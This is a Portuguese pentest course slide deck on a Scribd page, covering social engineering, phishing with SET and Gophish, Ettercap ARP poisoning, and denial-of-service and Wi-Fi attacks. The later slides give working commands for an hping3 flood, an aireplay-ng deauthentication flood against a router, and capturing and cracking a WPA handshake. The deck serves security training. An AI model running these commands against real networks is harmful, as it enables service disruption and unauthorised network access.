Scribd
Carregar
40 visualizações16 páginas

Estratégias de Engenharia Social e Phishing

O documento discute técnicas de engenharia social, como phishing, baiting, pretexting e quid pro quo, que visam manipular usuários para obter informações confidenciais. Também aborda ferramentas e métodos para executar ataques de negação de serviço, man in the middle e hacking de redes Wi-Fi.

Enviado por

joker.edotensei
Direitos autorais
© © All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd
40 visualizações16 páginas

Estratégias de Engenharia Social e Phishing

O documento discute técnicas de engenharia social, como phishing, baiting, pretexting e quid pro quo, que visam manipular usuários para obter informações confidenciais. Também aborda ferramentas e métodos para executar ataques de negação de serviço, man in the middle e hacking de redes Wi-Fi.

Enviado por

joker.edotensei
Direitos autorais
© © All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd

EMGENHARIA SOCIAL

Kerberos | Pentest Profissional


[Link]
Introdução A Engenharia Social
Ataques de “engenharia social” refere-se a estratégias utilizadas pelos
cibercriminosos com base em interação humana, visando enganar e iludir os
usuários para que desrespeitem regras básicas de segurança.
Nesse sentido, o ataque de engenharia social tem como principal característica
envolver algum tipo de manipulação psicológica, levando as vítimas a revelar dados
sensíveis ou confidenciais.
Em geral, a tática aposta em e-mails ou outros canais de comunicação para criar
senso de urgência, medo ou outras emoções para induzir os usuários a clicarem em
links maliciosos, informarem dados pessoais ou mesmo abrir arquivos mal
intencionados. A partir daí, os hackers podem concluir suas intenções criminosas.

Kerberos | Pentest Profissional


[Link]
Principais tipos de ataque de engenharia social
Phishing
Hoje, os golpes de phishing são a forma mais comum de ataque de engenharia
social. Aqui, os objetivos centrais da ameaça são:
usar links abreviados ou adulterados para direcionar os usuários para sites suspeitos
com landing pages maliciosas;
obter dados pessoais como nomes completos, endereços, credenciais de acesso,
CPF, RG e informações bancárias;
fazer uso de medo, ameaças e senso de urgência para induzir o usuário a fornecer
respostas rápidas.

Kerberos | Pentest Profissional


[Link]
Baiting
O termo baiting vem do inglês “bait”, ou seja, “isca”. Semelhante ao phishing, a prática
busca oferecer algo vantajoso e estimulante para o usuário em troca de informações de
login ou dados pessoais sigilosos.
A “isca”, nesse cenário, pode vir de muitas formas: tanto digital quanto física. Pode ser,
por exemplo, um download de filme ou música, ou ainda um pendrive deixado sobre a
mesa para que um usuário o encontre.
A partir do momento em que a isca é fisgada, o malware atinge diretamente sua vítima e
o hacker pode seguir com seu trabalho.

Kerberos | Pentest Profissional


[Link]
Pretexting
Nesse caso, os cibercriminosos assumem uma identidade ou papel falsos para atuar com alguém de
confiança das potenciais vítimas. Dessa forma, procuram obter acesso a dados ou sistemas
sensíveis e críticos.

Para tanto, o procedimento usual é pesquisar as redes sociais do usuário em questão para levantar
informações sobre sua vida pessoal, a exemplo de nomes dos pais, empresa, colegas de trabalho e
outras.
Por fim, a interação é realizada, geralmente via e-mail. Pode ser uma suposta mensagem do RH da
empresa em que a vítima trabalha, por exemplo, pedindo a confirmação de dados pessoais para um
determinado acesso.

Kerberos | Pentest Profissional


[Link]
Quid pro quo
Por sua vez, o quid pro quo atua de forma similar ao baiting. Aqui, o hacker solicita a
revelação de dados pessoais ou credenciais de login em troca de um serviço.

A vítima pode, por exemplo, receber uma ligação de um suposto especialista de TI


que oferece assistência gratuita – e solicita as informações de login no processo.
Outra situação comum diz respeito a hackers que contatam funcionários como se
fossem consultores realizando uma pesquisa, e oferecem uma quantia em dinheiro
para que os usuários forneçam acesso à rede corporativa do negócio.

Kerberos | Pentest Profissional


[Link]
Executando
Primeiro precisamos ligar o nosso servidor web.
#service apache2 start
#service apache 2 status
Nas nossas maqunas vamos buscar pela ferramenteo Social Enginner Toolkit.
#setoolkit

Kerberos | Pentest Profissional


[Link]
Como fazer uma campanha de Phishing

Ferramenta Gophish
Link de download: [Link]
Apos o download do gophish devemos fazer uma configuração basica no arquivo
([Link])
User: admin
Senha:gophish

Kerberos | Pentest Profissional


[Link]
Como fazer uma campanha de Phishing

Ferramenta Gophish
Link de download: [Link]
Apos o download do gophish devemos fazer uma configuração basica no arquivo
([Link])
User: admin
Senha:gophish

Kerberos | Pentest Profissional


[Link]
Ataques Man in The Middle

O man-in-the-middle (Homem no meio, em referência ao atacante que intercepta os
dados) é uma forma de ataque em que os dados trocados entre duas partes (por
exemplo, você e o seu banco) são de alguma forma interceptados, registrados e,
possivelmente, alterados pelo atacante sem que as vitimas se apercebam.

Análise de Tráfego de Rede

Ferramenta – Wireshark

Kerberos | Pentest Profissional


[Link]
Executando MITM

Nos progrmas abre o programa Ettercap no kali

Vamos mapear hosts a nível desta rede

1-Clicar nos três pontinhos, depois escolha opção host

2-Clicar Scan for hosts

3-Scan for Hosts

4-Hosts list

5-Escolher escolher os tagets de preferência 2

6- ativar arp pioson

Site de teste:[Link]

Kerberos | Pentest Profissional


[Link]
Ataques de Negação de Serviços

Um ataque de negação de serviço, é uma tentativa de tornar os recursos

de um sistema indisponíveis para os seus utilizadores. Alvos típicos são

servidores web, e o ataque procura tornar as páginas hospedadas

indisponíveis na rede. Não se trata de uma invasão do sistema, mas sim

da sua invalidação por sobrecarga.

Kerberos | Pentest Profissional


[Link]

DOS e DDOS

A principal diferença entre os dois é na forma com que eles são feitos. Enquanto o
ataque DDoS é distribuído entre várias máquinas, o ataque DoS é feito por apenas
um invasor que envia vários pacotes

EXECUÇÃO

Inicia o servidor Metasploitable
hping3 -a [Link] -p 80 --flood [Link] IP_do_Servidor

Kerberos | Pentest Profissional


[Link]
Atacar uma rede com ataque DDOS

airmon-ng

Iwconfig

airmon-ng start wlan0

airodump-ng wlan0

CTL+ C para parar escaneamento

airodump-ng -c+numero do canal --bssid mac do roteador wlan0

Abra outro terminal e Escreva!!!

aireplay-ng -0 10000000 -a mac do roteador wlan0

Kerberos | Pentest Profissional


[Link]
WIFI HACKING
Colocar a nossa interface no modo Monitor
airmon-ng start wlan0
Vamos Interceptar o trafego de qualquer rede
airodump-ng wlan0
Teremos: BSSID da rede
Nome da rede
Canal da rede
Listagem dos Usuários conectados na rede

Kerberos | Pentest Profissional


[Link]
Vamos Escolher uma Rede para Hackear
#airodump-ng –bssid XX:XX:XX:XX:XX:XX:XX:XX –w teste –c 1 wlan0
Irá gerar arquivos txt
Agora vamos desconectar um dispositivo na rede
Abra um novo terminal – aireplay-ng -0 10000000 -a BSSID interface da rede -c+MAC Do
cliente wlan0
Depois que a vitima se conectar vamos capturar o handshack
#aircrack-ng o (arquivo) -w usrshare/wordlists/[Link]
E esperamos ele quebrar a senha

Kerberos | Pentest Profissional


[Link]

Você também pode gostar